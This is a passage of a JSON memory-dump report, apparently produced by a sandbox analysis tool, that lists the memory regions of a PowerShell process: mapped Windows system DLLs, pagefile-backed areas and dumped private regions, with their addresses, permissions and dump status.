"private_memory", "start_va": 1114112, "timestamp": "00:00:47.194", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 570556416, "type": "region", "version": 1 }, "end_va": 571023359, "entry_point": 570556416, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_798", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 570556416, "timestamp": "00:00:47.194", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_799", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_800", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_801", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000802-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_802", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000803-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_803", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_808", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.324", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_809", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:47.324", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_810", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:47.324", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000811-addr_0x00000000002c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_811", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000812-addr_0x00000000005b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_812", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1855455232, "type": "region", "version": 1 }, "end_va": 1855758335, "entry_point": 1855455232, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_813", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1855455232, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1934163968, "type": "region", "version": 1 }, "end_va": 1934245887, "entry_point": 1934163968, "filename": "\\Windows\\System32\\atl.dll", "id": "region_814", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1934163968, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_815", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:47.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_816", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:47.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_817", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_818", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_819", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_820", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_821", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_822", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_823", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_824", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_825", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_826", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_827", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_828", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2195455, "entry_point": 0, "filename": null, "id": "region_829", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:47.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_830", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:47.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_831", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:47.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_832", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:47.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_833", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:47.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 929791, "entry_point": 917504, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_834", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:00:47.403", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000835-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_835", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000836-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_836", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000837-addr_0x0000000000260000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_837", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4984831, "entry_point": 0, "filename": null, "id": "region_838", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 18612223, "entry_point": 0, "filename": null, "id": "region_839", "name": "pagefile_0x00000000005c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6029312, "timestamp": "00:00:47.405", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000840-addr_0x0000000001370000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_121", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20381696, "type": "region", "version": 1 }, "end_va": 20447231, "entry_point": 0, "filename": null, "id": "region_840", "name": "private_0x0000000001370000", "norm_filename": null, "region_type": "private_memory", "start_va": 20381696, "timestamp": "00:00:47.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_841", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:47.405", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000842-addr_0x0000000001310000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 19988480, "type": "region", "version": 1 }, "end_va": 20250623, "entry_point": 0, "filename": null, "id": "region_842", "name": "private_0x0000000001310000", "norm_filename": null, "region_type": "private_memory", "start_va": 19988480, "timestamp": "00:00:47.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_843", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:47.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_844", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:47.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5959679, "entry_point": 0, "filename": null, "id": "region_845", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:00:47.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_846", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:00:47.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_847", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:00:47.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_848", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:00:47.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1953918975, "entry_point": 1953824768, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_849", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:00:47.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_850", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:00:47.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2367487, "entry_point": 0, "filename": null, "id": "region_851", "name": "pagefile_0x0000000000240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2359296, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_852", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2760703, "entry_point": 0, "filename": null, "id": "region_853", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000854-addr_0x00000000011e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 18743296, "type": "region", "version": 1 }, "end_va": 19005439, "entry_point": 0, "filename": null, "id": "region_854", "name": "private_0x00000000011e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18743296, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20447232, "type": "region", "version": 1 }, "end_va": 23392255, "entry_point": 20447232, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_855", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20447232, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1945370624, "type": "region", "version": 1 }, "end_va": 1946374143, "entry_point": 1945370624, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_856", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1945370624, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_857", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000858-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_858", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { 